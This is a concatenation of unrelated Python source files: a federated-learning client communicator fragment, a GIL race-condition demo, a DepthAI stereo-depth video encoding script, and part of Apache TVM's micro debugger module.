message = self.communicator.submitUpdate(
self.servers,
project_name,
self.token,
self.ssid,
fl_ctx,
self.client_name,
shareable,
execute_task_name,
)
return message
except FLCommunicationError as e:
self.logger.info(e)
def send_aux_message(self, project_name, topic: str, shareable: Shareable, timeout: float, fl_ctx: FLContext):
"""Send auxiliary message to the server.
Args:
project_name: FL study project name
topic: aux topic name
shareable: Shareable object
timeout: communication timeout
fl_ctx: FLContext
Returns:
A reply message
"""
try:
self.logger.debug("Starting to send aux message.")
message = self.communicator.auxCommunicate(
self.servers, project_name, self.token, self.ssid, fl_ctx, self.client_name, shareable, topic, timeout
)
return message
except FLCommunicationError as e:
self.logger.info(e)
def send_heartbeat(self, project_name):
try:
if self.token:
while not self.engine:
time.sleep(1.0)
self.communicator.send_heartbeat(
self.servers, project_name, self.token, self.ssid, self.client_name, self.engine
)
except FLCommunicationError as e:
self.communicator.heartbeat_done = True
def heartbeat(self):
"""Sends a heartbeat from the client to the server."""
pool = None
try:
pool = ThreadPool(len(self.servers))
return pool.map(self.send_heartbeat, tuple(self.servers))
finally:
if pool:
pool.terminate()
def pull_task(self, fl_ctx: FLContext):
"""Fetch remote models and update the local client's session."""
pool = None
try:
pool = ThreadPool(len(self.servers))
self.remote_tasks = pool.map(partial(self.fetch_execute_task, fl_ctx=fl_ctx), tuple(self.servers))
pull_success, task_name = self.check_progress(self.remote_tasks)
# # Update app_ctx's current round info
# if self.app_context and self.remote_models[0] is not None:
# self.app_context.global_round = self.remote_models[0].meta.current_round
# TODO: if some of the servers failed
# return self.model_manager.assign_current_model(self.remote_models)
return pull_success, task_name, self.remote_tasks
finally:
if pool:
pool.terminate()
def push_results(self, shareable: Shareable, fl_ctx: FLContext):
"""Push the local model to multiple servers."""
pool = None
try:
pool = ThreadPool(len(self.servers))
return pool.map(partial(self.push_execute_result, shareable=shareable, fl_ctx=fl_ctx), tuple(self.servers))
finally:
if pool:
pool.terminate()
def aux_send(self, topic, shareable: Shareable, timeout: float, fl_ctx: FLContext):
"""Push the local model to multiple servers."""
pool = None
try:
pool = ThreadPool(len(self.servers))
messages = pool.map(
partial(self.send_aux_message, topic=topic, shareable=shareable, timeout=timeout, fl_ctx=fl_ctx),
tuple(self.servers),
)
if messages is not None and messages[0] is not None:
# Only handle single server communication for now.
return messages
else:
return None
finally:
if pool:
pool.terminate()
def register(self):
"""Push the local model to multiple servers."""
pool = None
try:
pool = ThreadPool(len(self.servers))
return pool.map(self.client_register, tuple(self.servers))
finally:
if pool:
pool.terminate()
def set_primary_sp(self, sp):
pool = None
try:
pool = ThreadPool(len(self.servers))
return pool.map(partial(self.set_sp, sp=sp), tuple(self.servers))
finally:
if pool:
pool.terminate()
def run_heartbeat(self):
"""Periodically runs the heartbeat."""
self.heartbeat()
def start_heartbeat(self):
heartbeat_thread = threading.Thread(target=self.run_heartbeat)
heartbeat_thread.start()
def quit_remote(self, task_name, fl_ctx: FLContext):
"""Sending the last message to the server before leaving.
Args:
task_name: task name
fl_ctx: FLContext
Returns: N/A
"""
return self.communicator.quit_remote(self.servers, task_name, self.token, self.ssid, fl_ctx)
def set_client_engine(self, engine):
self.engine = engine
def close(self):
"""Quit the remote federated server, close the local session."""
self.logger.info("Shutting down client")
self.overseer_agent.end()
return 0
def check_progress(self, remote_tasks):
if remote_tasks[0] is not None:
self.server_meta = remote_tasks[0].meta
return True, remote_tasks[0].task_name
else:
return False, None
|
python_gil.py
|
#!usr/bin/python
# -*- coding:utf8 -*-
# gil global interpreter lock (ipython)
# python中一个线程对应c语言中的一个线程
# gil使得同一时刻只有一个线程运行在一个CPU上执行字节码,无法将多个线程映射到多个cpu上
# gil会根据执行的字节码行数以及时间片释放GIL,遇到IO操作也会释放
# import dis
# def add(a):
# a = a + 1
# return a
#
# print(dis.dis(add))
total = 0
def add():
global total
for i in range(1000000):
total += 1
def desc():
global total
for i in range(1000000):
total -= 1
import threading
thread1 = threading.Thread(target=add)
thread2 = threading.Thread(target=desc)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
print(total)
|
rgb-depth-encoding-v3.py
|
#!/usr/bin/env python3
import os
import cv2
import sys
import time
import depthai as dai
import numpy as np
import socket
import struct
import pickle
from pathlib import Path
from datetime import datetime
from argument_parser import argument_parser
from colormaps import apply_colormap
from utils import dequeue, dequeued_frames_dict, datetime_from_string, create_encoder, wlsFilter, compute_fps
import multiprocessing
import colored # https://pypi.org/project/colored/
rst = colored.attr('reset')
from circular_buffer import CircularBuffer
ringbuffer = CircularBuffer(10)
def preview_thread_impl(args, preview_counter, depth_frame, disp_img, rr_img, colored_disp):
if args.debug_preview_threading:
print(f'preview_thread_impl() got frame no.: {preview_counter} - {type(depth_frame)} - {type(disp_img)} - {type(rr_img)} - {type(colored_disp)}')
if args.preview_downscale_factor != 1:
depth_frame = cv2.resize(depth_frame, dsize=(depth_w//args.preview_downscale_factor, depth_h//args.preview_downscale_factor), interpolation=cv2.INTER_CUBIC)
if args.debug_img_sizes:
print(f'{depth_frame.shape = } - {len(depth_frame) = } - {type(depth_frame) = } - {depth_frame.size = }')
depth_frame_orig = cv2.normalize(depth_frame, None, 0, 255, cv2.NORM_MINMAX)
if args.show_colored_disp:
depth_frame = np.ascontiguousarray(depth_frame_orig)
# depth_frame is transformed, the color map will be applied to highlight the depth info
depth_frame = apply_colormap(depth_frame, cmap=13)
# depth_frame is ready to be shown
cv2.imshow("colored disparity", depth_frame)
# Retrieve 'bgr' (opencv format) frame
if args.show_rgb:
rgb_frame = in_rgb.getCvFrame()
if args.preview_downscale_factor != 1:
rgb_frame = cv2.resize(rgb_frame, dsize=(color_width//args.preview_downscale_factor, color_height//args.preview_downscale_factor), interpolation=cv2.INTER_CUBIC)
if args.debug_img_sizes:
print(f'{rgb_frame.shape = } - {len(rgb_frame) = } - {type(rgb_frame) = } - {rgb_frame.size = }')
cv2.imshow("rgb", rgb_frame)
#img_grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
if args.show_th_disp:
depth_frame_th = cv2.adaptiveThreshold(depth_frame_orig, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)
cv2.imshow("disparity th", depth_frame_th)
depth_frame_th_color = cv2.cvtColor(depth_frame_th, cv2.COLOR_GRAY2BGR)
if False:
rgb_frame_resized = cv2.resize(rgb_frame, dsize=(depth_w, depth_h), interpolation=cv2.INTER_CUBIC)
combo = (rgb_frame_resized + depth_frame_th_color) / 2
cv2.imshow("combo", combo)
if args.show_gray_disp and disp_img is not None:
cv2.imshow("grayscale disparity", disp_img)
if args.show_rr_img and rr_img is not None:
cv2.imshow("rr_img", rr_img)
if args.show_wls_preview:
cv2.imshow("WLS colored disp", colored_disp)
if cv2.waitKey(1) == ord('q'): # this is the culprit! https://answers.opencv.org/question/52774/waitkey1-timing-issues-causing-frame-rate-slow-down-fix/
return
args = argument_parser()
# Run with:
# ./rgb-depth-encoding.py --confidence 200 --no-extended-disparity --depth-resolution 720p --wls-filter
# ./rgb-depth-encoding-v2.py --confidence 200 --no-extended-disparity --depth-resolution 720p --rectified-left --rectified-right --no-write-preview --no-rgb --wls-filter
# ./rgb-depth-encoding.py --confidence 200 --no-extended-disparity --depth-resolution 720p --rectified-right --no-write-preview --no-rgb
# v2 - 60 FPS with rectified-right + rectified-left + disparity
# ./rgb-depth-encoding-v2.py --confidence 200 --no-extended-disparity --depth-resolution 720p --rectified-left --rectified-right --no-write-preview --no-rgb
# v2 - 46.5 FPS with rectified-right + disparity + RGB 1080p
# ./rgb-depth-encoding-v2.py --confidence 200 --no-extended-disparity --depth-resolution 720p --rectified-right --no-write-preview
start_time = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
color_outfn = f'{args.output_dir}/color-{start_time}.h265'
wls_outfn = f'{args.output_dir}/wls-{start_time}.avi'
rr_outfn = f'{args.output_dir}/rectright-{start_time}.h265'
rl_outfn = f'{args.output_dir}/rectleft-{start_time}.h265'
if args.disparity:
depth_outfn = f'{args.output_dir}/depth-{start_time}.h265'
else:
left_outfn = f'{args.output_dir}/left-{start_time}.h265'
right_outfn = f'{args.output_dir}/right-{start_time}.h265'
# video = cv2.VideoWriter('appsrc ! queue ! videoconvert ! video/x-raw ! omxh265enc ! video/x-h265 ! h265parse ! rtph265pay ! udpsink host=192.168.0.2 port=5000 sync=false',0,25.0,(640,480))
# Start defining a pipeline
pipeline = dai.Pipeline()
color_resolutions = {
'1080p': (1920, 1080, 60, dai.ColorCameraProperties.SensorResolution.THE_1080_P),
'4K' : (3840, 2160, 60, dai.ColorCameraProperties.SensorResolution.THE_4_K),
}
depth_resolutions = {
'720p': (1280, 720, 60, dai.MonoCameraProperties.SensorResolution.THE_720_P),
'800p': (1280, 800, 60, dai.MonoCameraProperties.SensorResolution.THE_800_P),
'400p': (640, 400, 120, dai.MonoCameraProperties.SensorResolution.THE_400_P),
}
color_resolution = color_resolutions[args.color_resolution]
depth_resolution = depth_resolutions[args.depth_resolution]
color_width, color_height, color_fps, color_profile = color_resolution
depth_width, depth_height, depth_fps, dprofile = depth_resolution
if args.rgb:
# Define a source - color camera
cam_rgb = pipeline.createColorCamera()
cam_rgb.setPreviewSize(color_width, color_height)
cam_rgb.setBoardSocket(dai.CameraBoardSocket.RGB)
cam_rgb.setResolution(color_profile)
cam_rgb.setInterleaved(False)
cam_rgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.RGB)
cam_rgb.setFps(color_fps)
print(f'\nSaving capture files to: {colored.fg("red") + args.output_dir + rst}\n')
# Define a source - two mono (grayscale) cameras
left = pipeline.createMonoCamera()
left.setResolution(dprofile)
left.setBoardSocket(dai.CameraBoardSocket.LEFT)
left.setFps(depth_fps)
right = pipeline.createMonoCamera()
right.setResolution(dprofile)
right.setBoardSocket(dai.CameraBoardSocket.RIGHT)
right.setFps(depth_fps)
# Create a node that will produce the depth map (using disparity output as it's easier to visualize depth this way)
depth = pipeline.createStereoDepth()
depth.setConfidenceThreshold(args.confidence)
#depth.setOutputRectified(True) # The rectified streams are horizontally mirrored by default
depth.setRectifyEdgeFillColor(0) # Black, to better see the cutout from rectification (black stripe on the edges)
depth.setLeftRightCheck(False)
if args.wls_filter: #or args.rectified_right or args.rectified_left:
xoutRectifiedRight = pipeline.createXLinkOut()
xoutRectifiedRight.setStreamName("rectifiedRight")
depth.rectifiedRight.link(xoutRectifiedRight.input)
xoutRectifiedLeft = pipeline.createXLinkOut()
xoutRectifiedLeft.setStreamName("rectifiedLeft")
depth.rectifiedLeft.link(xoutRectifiedLeft.input)
if args.write_wls_preview:
wls_cap = cv2.VideoWriter(wls_outfn, cv2.VideoWriter.fourcc('M','J','P','G'), depth_fps, (depth_width, depth_height))
#cv2.VideoWriter_fourcc(*"MJPG"), 30,(640,480))
'''
If one or more of the additional depth modes (lrcheck, extended, subpixel)
are enabled, then:
- depth output is FP16. TODO enable U16.
- median filtering is disabled on device. TODO enable.
- with subpixel, either depth or disparity has valid data.
Otherwise, depth output is U16 (mm) and median is functional.
But like on Gen1, either depth or disparity has valid data. TODO enable both.
'''
left.out.link(depth.left)
right.out.link(depth.right)
baseline = 75 #mm
disp_levels = 96
fov = 71.86
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
wls_data = [] # filtered_disp, colored_disp = pool.map(apply_wls_filter, (disp_imgs, rr_imgs))
#wls_results = []
wls_counter = 0
def wls_worker(queue_in, queue_out, wlsFilter):
print(f'wls_worker() thread {os.getpid()} starting...')
while True:
if args.debug_wls_threading:
print(f'Thread {os.getpid()} dequeuing (wls_queue_in.size: {wls_queue_in.qsize()})...')
item = queue_in.get(True)
if args.debug_wls_threading:
print(f'Thread {os.getpid()} got item {type(item)}...')
wls_counter, disp_img, rr_img = item
if args.debug_wls_threading:
print(f'Thread {os.getpid()} got frame no: {wls_counter} - {disp_img.shape} - {rr_img.shape}...')
wls_data = (wls_counter, disp_img, rr_img)
wls_counter_out, filtered_disp, colored_disp = wlsFilter.apply_wls_filter(wls_data)
if args.debug_wls_threading:
print(f'Thread {os.getpid()} completed frame no: {wls_counter} ({wls_counter_out}) - {disp_img.shape} - {rr_img.shape}...')
if args.write_wls_preview:
wls_cap.write(colored_disp)
if args.debug_wls_threading:
print(f'Thread {os.getpid()} enqueuing (wls_queue_out.size: {wls_queue_out.qsize()}) frame no: {wls_counter} ({wls_counter_out}) - {disp_img.shape} - {rr_img.shape} - {filtered_disp.shape} - {colored_disp.shape}...')
wls_queue_out.put((wls_counter_out, filtered_disp, colored_disp))
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
preview_data = []
preview_counter = 0
#def preview_worker(preview_queue_in):
def preview_worker():
global ringbuffer
print(f'preview_worker() thread {os.getpid()} starting...')
while True:
if args.debug_preview_threading:
#print(f'Thread {os.getpid()} dequeuing (preview_queue_in.size: {preview_queue_in.qsize()})...')
print(f'Thread {os.getpid()} dequeuing (len(ringbuffer): {len(ringbuffer)}) - {ringbuffer}...')
#preview_counter, ringbuffer = preview_queue_in.get(True)
if ringbuffer.isEmpty():
time.sleep(0.1)
continue
ringbuffer_item = ringbuffer.remove()
if args.debug_preview_threading:
#print(f'Thread {os.getpid()} got frame no.: {preview_counter} and ringbuffer_item {type(ringbuffer_item)}...')
print(f'Thread {os.getpid()} got ringbuffer_item {type(ringbuffer_item)}...')
preview_counter, depth_frame, disp_img, rr_img, colored_disp = ringbuffer_item
if args.debug_preview_threading:
print(f'Thread {os.getpid()} got frame no: {preview_counter} - {depth_frame.shape}...')
preview_thread_impl(args, preview_counter, depth_frame, disp_img, rr_img, colored_disp)
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
no_of_wls_threads = 16
wls_filter = None
wls_queue_in = None
wls_queue_out = None
wls_th_pool = None
if args.wls_filter:
wls_filter = wlsFilter(args, _lambda=8000, _sigma=1.5, baseline=baseline, fov=fov, disp_levels=disp_levels)
wls_queue_in = multiprocessing.Queue()
wls_queue_out = multiprocessing.Queue()
wls_th_pool = multiprocessing.Pool(no_of_wls_threads, wls_worker, (wls_queue_in, wls_queue_out, wls_filter, ))
# don't forget the comma here ^
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
'''
no_of_preview_threads = 1
preview_filter = None
preview_queue_in = None
preview_th_pool = None
if args.show_preview:
preview_queue_in = multiprocessing.Queue()
preview_th_pool = multiprocessing.Pool(no_of_preview_threads, preview_worker, (preview_queue_in, ))
# don't forget the comma here ^
'''
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
import threading
preview_thread = threading.Thread(target=preview_worker, args=[])
preview_thread.start()
print(f'Active Threads: {threading.active_count()}')
if args.wls_filter or args.show_preview:
# Create output
xout_dep = pipeline.createXLinkOut()
xout_dep.setStreamName("disparity")
if args.debug_pipeline_types:
print(f'{type(cam_rgb) = } - {cam_rgb = }')
print(f'{type(cam_rgb.video) = } - {cam_rgb.video = }')
print(f'{type(cam_rgb.preview) = } - {cam_rgb.preview = }')
print(f'{type(depth) = } - {depth = }')
print(f'{type(depth.disparity) = } - {depth.disparity = }')
depth.disparity.link(xout_dep.input)
if args.rgb:
stream_name = 'h265_rgb'
print(f'Enabling stream: {colored.fg("red") + stream_name + rst}')
videorgbEncoder, videorgbOut = create_encoder(pipeline, cam_rgb.video, color_resolution, stream_name)
if args.disparity:
stream_name = 'h265_depth'
print(f'Enabling stream: {colored.fg("blue") + stream_name + rst}')
videodispEncoder, videodispOut = create_encoder(pipeline, depth.disparity, depth_resolution, stream_name)
else:
stream_name = 'h265_left'
print(f'Enabling stream: {colored.fg("green") + stream_name + rst}')
videoleftEncoder, videoleftOut = create_encoder(pipeline, depth.syncedLeft, depth_resolution, stream_name)
stream_name = 'h265_right'
print(f'Enabling stream: {colored.fg("yellow") + stream_name + rst}')
videorightEncoder, videorightOut= create_encoder(pipeline, depth.syncedRight, depth_resolution, stream_name)
#if args.wls_filter or args.rectified_left:
if args.rectified_left:
stream_name = 'h265_rl'
print(f'Enabling stream: {colored.fg("light_green") + stream_name + rst}')
videorlEncoder, videorlOut = create_encoder(pipeline, depth.rectifiedLeft, depth_resolution, stream_name)
if args.wls_filter or args.rectified_right:
stream_name = 'h265_rr'
print(f'Enabling stream: {colored.fg("light_yellow") + stream_name + rst}')
videorrEncoder, videorrOut = create_encoder(pipeline, depth.rectifiedRight, depth_resolution, stream_name)
if args.show_preview:
depth_size = (depth_width, depth_height)
color_size = (color_width, color_height)
if args.preview_downscale_factor != 1:
color_size = (color_width//args.preview_downscale_factor, color_height//args.preview_downscale_factor)
depth_size = (depth_width//args.preview_downscale_factor, depth_height//args.preview_downscale_factor)
# Pipeline defined, now the device is connected to
with dai.Device(pipeline, usb2Mode=args.force_usb2) as device:
# Start pipeline
#device.startPipeline()
if args.wls_filter or args.show_preview:
# Output queue will be used to get the rgb frames from the output defined above
q_dep = device.getOutputQueue(name="disparity", maxSize=30, blocking=False)
# Output queue will be used to get the encoded data from the output defined above
if args.rgb:
q_265c = device.getOutputQueue(name="h265_rgb", maxSize=30, blocking=False)
if args.disparity:
q_265d = device.getOutputQueue(name="h265_depth", maxSize=30, blocking=False)
else:
q_265l = device.getOutputQueue(name="h265_left", maxSize=30, blocking=False)
q_265r = device.getOutputQueue(name="h265_right", maxSize=30, blocking=False)
if args.wls_filter:
q_rright = device.getOutputQueue(name="rectifiedRight", maxSize=30, blocking=False)
q_rleft = device.getOutputQueue(name="rectifiedLeft", maxSize=30, blocking=False)
if args.rectified_right:
q_265rr = device.getOutputQueue(name="h265_rr", maxSize=30, blocking=False)
if args.rectified_left:
q_265rl = device.getOutputQueue(name="h265_rl", maxSize=30, blocking=False)
cmap_counter = 0
# The .h265 file is a raw stream file (not playable yet)
if args.rgb:
videorgbFile = open(color_outfn,'wb')
if args.disparity:
#videorgbFile = open(color_outfn,'wb')
videodepthFile = open(depth_outfn,'wb')
else:
#videorgbFile = open(color_outfn,'wb')
videoleftFile = open(left_outfn, 'wb')
videorightFile = open(right_outfn,'wb')
if args.wls_filter or args.rectified_right:
videorrFile = open(rr_outfn, 'wb')
if args.wls_filter or args.rectified_left:
videorlFile = open(rl_outfn, 'wb')
print("Press Ctrl+C to stop encoding...")
try:
start_capture_time = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
last_time = start_time
while True:
if args.rgb:
in_h265c = dequeue(q_265c, 'rgb-h265' , args.debug_pipeline_steps, 1, debug=False)
if args.wls_filter or args.rectified_right:
in_h265rr = dequeue(q_265rr, 'rright-h265', args.debug_pipeline_steps, 2, debug=False)
#if args.wls_filter or args.rectified_left:
if args.rectified_left:
in_h265rl = dequeue(q_265rl, 'rleft-h265' , args.debug_pipeline_steps, 3, debug=False)
if args.disparity:
in_h265d = dequeue(q_265d, 'depth-h265' , args.debug_pipeline_steps, 4, debug=False)
else:
in_h265l = dequeue(q_265l, 'left-h265' , args.debug_pipeline_steps, 5, debug=False)
in_h265r = dequeue(q_265r, 'right-h265' , args.debug_pipeline_steps, 6, debug=False)
if args.wls_filter or args.show_preview:
in_depth = dequeue(q_dep, 'depth-preview', args.debug_pipeline_steps, 7, debug=False)
if args.debug_pipeline_steps:
print('8. all queues done')
if args.rgb:
in_h265c.getData().tofile(videorgbFile) # appends the packet data to the opened file
if args.disparity:
in_h265d.getData().tofile(videodepthFile) # appends the packet data to the opened file
else:
in_h265l.getData().tofile(videoleftFile) # appends the packet data to the opened file
in_h265r.getData().tofile(videorightFile) # appends the packet data to the opened file
if args.wls_filter or args.rectified_right:
in_h265rr.getData().tofile(videorrFile) # appends the packet data to the opened file
#if args.wls_filter or args.rectified_left:
if args.rectified_left:
in_h265rl.getData().tofile(videorlFile) # appends the packet data to the opened file
curr_time = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
last_time = compute_fps(curr_time, last_time, start_capture_time, dequeued_frames_dict)
disp_img = rr_img = colored_disp = None
if args.wls_filter:
in_rright = q_rright.get()
rr_img = in_rright.getFrame()
#rr_img = cv2.flip(rr_img, flipCode=1)
disp_img = in_depth.getFrame()
if args.preview_downscale_factor:
rr_img = cv2.resize(rr_img, dsize=(depth_width//args.preview_downscale_factor, depth_height//args.preview_downscale_factor), interpolation=cv2.INTER_CUBIC)
disp_img = cv2.resize(disp_img, dsize=(depth_width//args.preview_downscale_factor, depth_height//args.preview_downscale_factor), interpolation=cv2.INTER_CUBIC)
if args.wls_max_queue == 0 or wls_queue_in.qsize() < args.wls_max_queue:
wls_counter += 1
if args.debug_wls_threading:
print(f'Main thread enqueuing frame no: {wls_counter} because wls_queue_in.size: {wls_queue_in.qsize()}...')
#flipHorizontal = cv2.flip(rr_img, 1)
wls_queue_in.put((wls_counter, disp_img, rr_img))
if args.show_wls_preview:
if args.wls_max_queue == 0 or wls_queue_in.qsize() < args.wls_max_queue:
if args.debug_wls_threading:
print(f'Main thread dequeuing frame because wls_queue_out.size: {wls_queue_out.qsize()}...')
item = wls_queue_out.get(True)
if args.debug_wls_threading:
print(f'Main thread got item {type(item)}...')
wls_counter_out, filtered_disp, colored_disp = item
if args.debug_wls_threading:
print(f'Main thread got frame no: {wls_counter_out} - {filtered_disp.shape} - {colored_disp.shape}...')
if args.show_preview:
#if args.preview_max_queue == 0 or preview_queue_in.qsize() < args.preview_max_queue:
if True:
if args.debug_preview_threading:
#print(f'Main thread enqueuing frame no: {preview_counter} because preview_queue_in.size: {preview_queue_in.qsize()}...')
print(f'Main thread enqueuing frame no: {preview_counter} because len(ringbuffer): {len(ringbuffer)}...')
# data is originally represented as a flat 1D array, it needs to be converted into HxW form
depth_h, depth_w = in_depth.getHeight(), in_depth.getWidth()
if args.debug_img_sizes:
print(f'{depth_h = } - {depth_w = }')
depth_frame = in_depth.getData().reshape((depth_h, depth_w)).astype(np.uint8)
if not ringbuffer.isFull():
ringbuffer.add((preview_counter, depth_frame, disp_img, rr_img, colored_disp))
#preview_queue_in.put((preview_counter, ringbuffer))
if args.debug_preview_threading:
print(f'len(ringbuffer): {len(ringbuffer)} - {ringbuffer}...')
preview_counter += 1
cmap_counter += 1
except KeyboardInterrupt:
# Keyboard interrupt (Ctrl + C) detected
if args.disparity:
videodepthFile.close()
else:
videoleftFile.close()
videorightFile.close()
run_time = datetime_from_string(curr_time) - datetime_from_string(start_capture_time)
print(f'{start_time = } - {start_capture_time = } - {curr_time = } - {run_time = }')
print('Frames statistics:')
for stream, frames in dequeued_frames_dict.items():
fps = frames/run_time.total_seconds()
print(f'{stream = } - {frames = } - {fps = :.2f}')
print("To view the encoded data, convert the stream file (.h265) into a video file (.mp4) using a command below:")
print("ffmpeg -framerate 30 -i video.h265 -c copy video.mp4")
preview_thread.join()
|
debugger.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Defines functions for controlling debuggers for micro TVM binaries."""
import atexit
import abc
import logging
import os
import signal
import subprocess
import sys
import termios
import threading
import psutil
from .._ffi import register_func
from . import class_factory
from . import transport
_LOG = logging.getLogger(__name__)
class Debugger(metaclass=abc.ABCMeta):
"""An interface for controlling micro TVM debuggers."""
def __init__(self):
self.on_terminate_callbacks = []
@abc.abstractmethod
def start(self):
"""Start the debugger, but do not block on it.
The runtime will continue to be driven in the background.
"""
raise NotImplementedError()
@abc.abstractmethod
def stop(self):
"""Terminate the debugger."""
raise NotImplementedError()
def _run_on_terminate_callbacks(self):
for callback in self.on_terminate_callbacks:
try:
callback()
except Exception: # pylint: disable=broad-except
_LOG.warning("on_terminate_callback raised exception", exc_info=True)
class GdbDebugger(Debugger):
"""Handles launching, suspending signals, and potentially dealing with terminal issues."""
# Number of seconds to wait in stop() for a graceful shutdown. After this time has elapsed,
# the debugger is kill()'d.
_GRACEFUL_SHUTDOWN_TIMEOUT_SEC = 5.0
# The instance of GdbDebugger that's currently started.
_STARTED_INSTANCE = None
@classmethod
def _stop_all(cls):
if cls._STARTED_INSTANCE:
cls._STARTED_INSTANCE.stop()
def __init__(self):
super(GdbDebugger, self).__init__()
self._is_running = False
self._child_alive_lock = threading.RLock()
self._is_child_alive = False
@abc.abstractmethod
def popen_kwargs(self):
raise NotImplementedError()
def _wait_for_child(self):
self.popen.wait()
with self._child_alive_lock:
self._is_child_alive = True
@classmethod
def _sigint_handler(cls, signum, stack_frame): # pylint: disable=unused-argument
if cls._STARTED_INSTANCE is not None:
with cls._STARTED_INSTANCE._child_alive_lock:
exists = cls._STARTED_INSTANCE._is_child_alive
if exists:
try:
os.killpg(cls._STARTED_INSTANCE.child_pgid, signal.SIGINT)
return
except ProcessLookupError:
pass
raise Exception()
def start(self):
assert not self._is_running
assert not self._STARTED_INSTANCE
kwargs = self.popen_kwargs()
self.did_start_new_session = kwargs.setdefault("start_new_session", True)
self.old_termios = termios.tcgetattr(sys.stdin.fileno())
self.popen = subprocess.Popen(**kwargs)
self._is_running = True
self.__class__._STARTED_INSTANCE = self
try:
self.child_pgid = os.getpgid(self.popen.pid)
except Exception:
self.stop()
raise
with self._child_alive_lock:
self._is_child_alive = True
self.old_sigint_handler = signal.signal(signal.SIGINT, self._sigint_handler)
t = threading.Thread(target=self._wait_for_child)
t.daemon = True
t.start()
def stop(self):
if not self._is_running:
return
signal.signal(signal.SIGINT, self.old_sigint_handler)
termios.tcsetattr(sys.stdin.fileno(), termios.TCSAFLUSH, self.old_termios)
try:
children = psutil.Process(self.popen.pid).children(recursive=True)
for c in children:
c.terminate()
_, alive = psutil.wait_procs(children, timeout=self._GRACEFUL_SHUTDOWN_TIMEOUT_SEC)
for a in alive:
a.kill()
finally:
self.__class__._STARTED_INSTANCE = None
self._is_running = False
self._run_on_terminate_callbacks()
atexit.register(GdbDebugger._stop_all)
class GdbTransportDebugger(GdbDebugger):
"""A debugger that uses a single GDB subprocess as both the transport and the debugger.
Opens pipes for the target's stdin and stdout, launches GDB and configures GDB's target
arguments to read and write from the pipes using /dev/fd.
"""
def __init__(self, args, **popen_kw):
super(GdbTransportDebugger, self).__init__()
self.args = args
self.popen_kw = popen_kw
def popen_kwargs(self):
stdin_read, stdin_write = os.pipe()
stdout_read, stdout_write = os.pipe()
os.set_inheritable(stdin_read, True)
os.set_inheritable(stdout_write, True)
sysname = os.uname()[0]
if sysname == "Darwin":
args = [
"lldb",
"-O",
f"target create {self.args[0]}",
"-O",
f"settings set target.input-path /dev/fd/{stdin_read}",
"-O",
f"settings set target.output-path /dev/fd/{stdout_write}",
]
if len(self.args) > 1:
args.extend(
["-O", "settings set target.run-args {}".format(" ".join(self.args[1:]))]
)
elif sysname == "Linux":
args = (
["gdb", "--args"] + self.args + ["</dev/fd/{stdin_read}", ">/dev/fd/{stdout_write}"]
)
else:
raise NotImplementedError(f"System {sysname} is not yet supported")
self.fd_transport = fd.FdTransport(stdout_read, stdin_write)
self.fd_transport.open()
return {
"args": args,
"pass_fds": [stdin_read, stdout_write],
}
def _wait_for_process_death(self):
self.popen.wait()
self.fd_transport.close()
def start(self):
to_return = super(GdbTransportDebugger, self).start()
threading.Thread(target=self._wait_for_process_death, daemon=True).start()
return to_return
def stop(self):
self.fd_transport.close()
super(GdbTransportDebugger, self).stop()
class _Transport(transport.Transport):
def __init__(self, gdb_transport_debugger):
self.gdb_transport_debugger = gdb_transport_debugger
def timeouts(self):
return transport.debug_transport_timeouts()
def open(self):
pass # Pipes opened by parent class.
def write(self, data, timeout_sec):
return self.gdb_transport_debugger.fd_transport.write(data, timeout_sec)
def read(self, n, timeout_sec):
return self.gdb_transport_debugger.fd_transport.read(n, timeout_sec)
def close(self):
pass # Pipes closed by parent class.
def transport(self):
return self._Transport(self)
class GdbRemoteDebugger(GdbDebugger):
"""A Debugger that invokes GDB and attaches to a remote GDBserver-based target."""
def __init__(
self, gdb_binary, remote_hostport, debug_binary, wrapping_context_manager=None, **popen_kw
):
super(GdbRemoteDebugger, self).__init__()
self.gdb_binary = gdb_binary
self.remote_hostport = remote_hostport
self.debug_binary = debug_binary
self.wrapping_context_manager = wrapping_context_manager
self.popen_kw = popen_kw
def popen_kwargs(self):
kwargs = {
"args": [
self.gdb_binary,
"-iex",
f"file {self.debug_binary}",
"-iex",
f"target remote {self.remote_hostport}",
],
}
kwargs.update(self.popen_kw)
return kwargs
def start(self):
if self.wrapping_context_manager is not None:
self.wrapping_context_manager.__enter__()
super(GdbRemoteDebugger, self).start()
def stop(self):
try:
super(GdbRemoteDebugger, self).stop()
finally:
if self.wrapping_context_manager is not None:
self.wrapping_context_manager.__exit__(None, None, None)
GLOBAL_DEBUGGER = None
class DebuggerFactory(class_factory.ClassFactory):
SUPERCLASS = Debugger
def launch_debugger(debugger_factory, *args, **kw):
global GLOBAL_DEBUGGER
if GLOBAL_DEBUGGER is not None:
stop_debugger()
GLOBAL_DEBUGGER = debugger_factory.instantiate(*args, **kw)
GLOBAL_DEBUGGER.start()
@register_func("tvm.micro.debugger.launch_debugger")
